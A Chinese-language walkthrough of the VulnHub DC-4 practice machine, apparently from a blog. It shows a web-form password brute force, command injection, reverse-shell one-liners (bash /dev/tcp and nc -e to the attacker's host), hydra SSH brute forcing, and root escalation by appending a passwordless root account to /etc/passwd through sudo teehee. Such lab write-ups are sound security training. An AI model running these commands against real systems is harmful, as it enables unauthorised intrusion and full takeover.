DC系列第四个靶机
下载地址:https://www.vulnhub.com/entry/dc-4,313/

老规矩先扫描以下局域网内的主机ip

arp-scan -l


扫一下端口:

nmap -A -p- 192.168.1.101

只看放了22和80端口,先进80端口看看有什么

只有一个表单,猜测Username应该是admin,先不急着爆破。
用dirsearch扫了一下目录,只有一个登录界面:

所以现在只能从80或22端口找突破口了,22端口需要同时爆破账号和密码,太麻烦而且也不知道能不能爆破出来。现在尝试爆破80端口的表单,开启BP:

爆出来密码为happy:

这里即使爆破成功显示的状态码也是302,差点大意跳过了,又猛一拉下看到happy为密码的Length长度不一样

使用happy密码登录:

登录成功,页面很简单
点击Command发现可以通过前端执行命令:

抓包修改命令如下:

如此我们便可以反弹一个shell过来:
这里尝试使用bash反弹但没留意bash反弹shell的命令中的 & 符号,&符号在表单中会被认为是参数连接的标志,所以一下命令中

bash -i >& /dev/tcp/192.168.1.104/7777 0>&1

&前后的字符会被分割,所以我们只有使用不带有&符号的反弹命令——nc如下:

nc -e /bin/bash 192.168.1.104 7777

步骤:
在表单中使用命令连接kali:

nc -e /bin/bash 192.168.1.104 7777

kali上对7777端口进行监听:

连接成功!

进入后发现是非交互式shell,可以使用python升级为交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

但这里不升级shell也不影响后续操作

在home/jim/backups中找到了一份旧密码:

使用hydra爆破ssh

hydra -l jim -P /password.txt -vV -e ns 192.168.1.101 ssh

终端上连接ssh:

ssh jim@192.168.1.101 -p 22

登录成功

我们的最终目录是获得root下的flag,那就直奔提权去
看一下jim具有权限

find -perm -4000


重点看sudo和su,但发现jim不能使用sudo命令

内核漏洞也没有,到这不知道怎么办了
回头又看了一遍发现登录jim时有个提示被我选择性忽略了:

有一份邮件,去看看

cd var/spool/mail      //邮件存放地址
ls
cat jim

内容是:Charles去度假了,因此老板要求他把他的密码给jim防止出现什么问题。
可怜的老实人jim,同事周六去度假了他还要上班

登录Charles的账号,查看他的sudo权限:

那就使用teehee来提权了,第一次遇到teehee提权的方法,
teehee提权是使用teehee -a 把一个账号密码写入到etc/passwd中,这个用户具有root权限,再切换到这个用户即可

echo "light::0:0:::/bin/bash" | sudo teehee -a /etc/passwd    //提权语句
su light
cat /root/flag.txt



DC-4靶场练习—teehee提权相关推荐

  1. Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)

    Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权) 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware ...

  2. 【安全】靶场实战-通过MS16-032提权

    个人介绍:188号安全攻城狮 [甲方安全工程师/CISSP/培训讲师] 目前恶补相关安全知识中,欢迎各位一起技术探讨. 每一次评论/点赞,都将成为我继续分享的动力 MS16-032简介 该漏洞影响从V ...

  3. 基于Ha-Joker靶场的完整渗透测试演示直至提权(root)

    信息收集 ┌──(root㉿kali)-[~] └─# arp-scan -l # 通过ARP-scan进行快速的主机发现, 如下图我们猜测10.10.10.138可能是目标主机 ┌──(root㉿k ...

  4. 【甄选靶场】Vulnhub百个项目渗透——项目三十八:Tommy-Boy-1(修改UA,脏牛提权)

    Vulnhub百个项目渗透 Vulnhub百个项目渗透--项目三十八:Tommy-Boy-1(修改UA,脏牛提权) 这个靶场被我打坏了,忘记快照了,自行官网下载哈~~

  5. Stapler-1靶场详细教学(7种漏洞利用+5种提权)

    目录 前言 简介 信息收集 0x00 主机发现 0x01 端口探测 0x02 信息收集-1 0x03 信息收集-2 0x04 漏洞利用-1 0x05 信息收集-3 0x06 漏洞利用-2 0x07 漏 ...

  6. Vulnhub靶场渗透测试系列DC-2(wpscan使用和git提权)

    Vulnhub靶场渗透测试系列DC-2(wpscan使用和git提权) 靶机地址:https://www.five86.com/dc-2.html 下载靶机将其导入到VMware,然后设置网络模式为N ...

  7. 【甄选靶场】Vulnhub百个项目渗透——项目十六:FristiLeaks_1.3(文件上传,py脚本改写,sudo提权,脏牛提权,源码获取)

    Vulnhub百个项目渗透 Vulnhub百个项目渗透--项目十六:FristiLeaks_1.3(文件上传,py脚本改写,sudo提权,脏牛提权,源码获取) 靶场地址

  8. 【甄选靶场】Vulnhub百个项目渗透——项目一:GoldenEye(密码爆破,图片逆向分析,内核提权)

    Vulnhub百个项目渗透 靶场自取 提取码:rong Vulnhub百个项目渗透--项目一:GoldenEye(密码爆破,图片逆向分析,内核提权)

  9. 6-vulnhub靶场-LordOfTheRoot_1.0.1靶机内核提权udf提权缓冲区溢出提权

    6-LordOfTheRoot_1.0.1 靶机地址 https://www.vulnhub.com/entry/lord-of-the-root-101,129/ 难度 中等(主要是缓冲区溢出) 1 ...

最新文章

  1. 毕设开发日志2017-11-03
  2. wxpython界面切换_Python图形界面—wxPython库的布局管理及页面切换
  3. 数字编码电位器c语言,数字电位器——x9c104
  4. 华为面试题算什么,这个背会了外企随便进
  5. Python 开发工具集:关于文档、测试、调试、程序的优化和分析
  6. 深度学习推荐模型-NFM
  7. 【每日算法Day 102】美团 AI 平台算法工程师面试编程题
  8. 6.4 First Missing Positive --- 图解
  9. 4. 简单的webservices 例子
  10. 魔方机器人之下位机编程---模拟PWM
  11. php+ddos原理,PHP DDos的几个防御方法详解_PHP教程
  12. msdtc与oracle,如何解决在Win2003的Oracle链接服务器上MSDTC事务失败问题
  13. 前端培训,达内黑马、丁鹿学堂、北大青鸟?
  14. bat文件批量创建文件夹
  15. 如何在云服务器搭建虚拟主机,如何在云服务器搭建虚拟主机
  16. ServerStatus 云探针部署
  17. 企业服务总线ESB是什么
  18. CSS3相比CSS新增哪些功能
  19. 在html中打字如何变大,如何把字体放大 如何更改桌面与网页字体大小-电脑教程...
  20. matlab制作水印,怎么在含有水印的图像中提取出水印

热门文章

  1. 小学期c语言电脑的总结,小学期实践报告和总结
  2. 服务器inetpub是什么文件夹,处理inetpub文件夹在win10中的问题
  3. 安装RSF自动化环境
  4. 苹果App Store最新应用审核标准
  5. c++等边三角形(DFS实例)
  6. spring-boot-starter-quartz 添加定时任务立即执行一次的问题解决
  7. 【Paper】2022_Fixed-Time Cooperative Tracking for Delayed Disturbed Multi-Agent Systems Under Dynamic
  8. 打开我的电脑显示计算机管理 不显示磁盘,win10打开此电脑不显示磁盘盘符的解决方法?...
  9. stm32 为什么有二个晶振
  10. 伯禹公益AI《动手学深度学习PyTorch版》Task 07 学习笔记